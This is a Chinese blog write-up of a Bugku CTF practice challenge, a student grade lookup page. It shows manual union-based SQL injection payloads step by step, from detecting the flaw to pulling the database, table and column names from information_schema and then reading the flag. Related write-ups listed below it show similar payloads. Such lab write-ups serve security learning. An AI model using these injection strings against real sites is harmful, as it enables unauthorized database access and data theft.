Bugku学生成绩查询

最新推荐文章于 2023-08-17 18:38:05 发布
最新推荐文章于 2023-08-17 18:38:05 发布
阅读量2k 收藏 7
点赞数 3
分类专栏: bugku
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44813849/article/details/104974387
版权

我们首先分别输入1,2,3,均有输出。
输入1,正常。输入1’ 错误。输入1’#正常,说明存在注入点。
因此我们可以判断存在sql注入。
在这里插入图片描述在这里插入图片描述在这里插入图片描述
接着使用order by 来看有几列,我们可以从1开始测试或者使用均分法先从一个大的数据测,然后再分半。这一题测试过后只有四列,5就开始出错了
在这里插入图片描述在这里插入图片描述接着使用union联合注入,union 的作用是将两个 sql 语句进行联合,union 前后的两个 sql 语句的选择列数要相同才可以。记得把前面的查询数据置空,写成id=-1即可,显示正常,说明确确实实存在这四列数据
在这里插入图片描述发现有四个表且都有回显,然后开始爆破表名。
首先爆库名:通过id=-1’ union select 1,2,3,database()#得到数据库名skctf_flag
在这里插入图片描述然后爆表名:通过使用 id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc
在这里插入图片描述接下来开始爆字段:id=-1’union select 1,2,3,group_concat(column_name)from information_schema.columns where table_name=0x666c3467#注意最后的表名要用十六进制进行加密。得到字段skctf_flag
在这里插入图片描述最后就是查询数据了,通过使用:id=-1’ union select 1,2,3,skctf_flag from fl4g#
在这里插入图片描述得到flag。

Lstop.
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
Bugku web17 学生成绩查询
weixin_44522540的博客
02-23 226
十九、web17 学生成绩查询 id=1时,可以查询成绩 id=1’ 为空 id=1’ and 1=1 # 与 id=1’ and 1=2 # 结果不同,由此判读可能存在sql注入 1、尝试获取列数 id=1’ order by 4 #,正常回显, id=1’ order by 5 #,异常,由此判断有4列 2、union联合查询 id=-1’ union select 1,2,3,4#,正常显示,说明存在这四列数据 3、爆库名、用户和版本 id=-1’ union select 1234,da
Bugku-成绩查询
qq_56611811的博客
05-17 352
进入题目差不多能够猜到是关于sql注入的题,1'没有返回结果,1'#能够成功查询,这说明注释符是有效果的。2.当num是5时无法回显内容,说明表可能有4列。
bugku 成绩查询(sql)
qq_63875498的博客
12-04 741
bugku 成绩查询(sql)
bugku--成绩查询
hxhabcd123的博客
08-28 1306
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
【CTF-web】bugku-成绩查询(sql注入)
Sankkl1的博客
08-17 460
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
Bugku 成绩查询
m0_63711447的博客
04-07 852
这道题按照正常的SQL注入步骤进行即可,没有绕弯弯的地方 1、打开题目环境,在输入框中输入数字1得到成绩回显,输入2和3也能得到相应的回显 2、测试参数包裹方式,输入1'没有得到回显 输入1'#进行注释,得到回显 3、用order by语句测试有几列,输入1' order by 4#时有回显,order by 5时无回显,说明有四列 4、接下使用联合查询语句测试有几个回显点,注意将前面的参数值置换为空,由图可知有三个回显点 5、查库名 输入-1'union select 1,2,3,g
bugku杂项题writeup
11-22
bugku杂项题writeup
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
BUGKU-成绩查询
m0_64180167的博客
12-03 886
打开环境 随便输入 发现URL 不传参 怀疑是POST型于是我们查看源代码发现是POST型打开终端因为是POST型 所以有两种方式语法:sqlmap -r "txt地址"kali中要下载数据包 我们在物理windows系统上的BP进行抓取 打包成文件然后把后缀改成.txt 通过共享文件传输到kali中,或者直接从桌面拖到kali桌面中打开sqlmap运行指令sqlmap -r "bugku.txt"于是我们开始爆破库sqlmap -r "bugku.txt" --tables 把库名和表名爆出来了然后我们发
BUGKU CTF--web 基础{成绩查询}
lulu001128的博客
12-03 730
BUGKU CTF--web 基础{成绩查询}解题过程
Bugku-web之成绩查询
weixin_42939822的博客
03-14 3396
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
Bugku成绩查询:一次简单的SQL注入过程
xhxtalent的博客
10-20 492
1很重要,一般来说在数据库中id不会有等于负数的,所以union联合查找前面部分的是错误的,故就是显示后面的查询内容,不然不会显示后面的查询内容的。一共查询到两个表名,分别是fl4g和sc表,我们需要但是flag,很大概率在fl4g表中,所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”,那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了,说明存在注入点的。递增上去,如果页面如果出现了错误,那么字段数就是当前的数字减1。分别输入1,2,3返回的是不同人名的成绩单。
BugKu学生成绩查询 详解 SQL注入
布屿
05-18 2010
根据测试,源代码伪代码如下: <?php //链接数据库 mysql_connet("[datebase]","[user]","[password]") or //检查错误,处理无法访问数据库的情况 die("Could not connect:" . mysql_error()); //选择数据库 mysql_select_db("[database_name]"); //从POS...
Bugku--学生成绩查询
Golderant的博客
01-17 2972
首先测试正常数据。 尝试在正常数据后加上单引号,发现数据为空,加个注释符发现依旧可以正常输出。 尝试获取列数,因为已经输出名字和3科分数,所以就猜4和5,得知查询结果中有4列。 尝试直接联合查询,这里要记得把前面查询为空。== 根据数据库去查表名 找到fl4g表,下一步,找列名 最后一步,知道表名知道列名啦,去获取数据吧~~ 关于这个题呢,因为表fl
bugku 成绩查询
Superpig的博客
11-10 2287
分析 典型的sql联合注入,用bp进行爆破。 step1: 联合注入要求查询列数相同,姓名、语数外一共四个数据,因此select 1,2,3,4 令id=a’是为了使前一个查询无效而回显第二个查询(也可以使用其他字符,只要保证union前的查询无效即可) id=a' union select 1,2,3,4# step2:查询数据库名 id=a' union select 1,2,3,datab...
bugku成绩单(sql注入)writeup
热门推荐
xuchen16的博客
09-20 1万+
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩   SQL注入应该没跑了   输入1'返回异常,输入1'--+返回异常,输入1' #或者1’-- +返回正常,看来过滤了--+   观察,表貌似有四列(名字,Math,English,Chinese),输入1' order by 4#返回正常,输入1' order by 5#返回异常,看来的确是4列   接下来就开始暴库名...
Bugku post
最新发布
09-21
根据提供的引用内容,Bugku post是一个题目的要求,要求在两秒内提交一道很长的计算题答案,并且式子每次刷新都会变动。需要使用POST方式传入一个变量名为value的值。具体的解题步骤包括创建一个Python文件,导入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值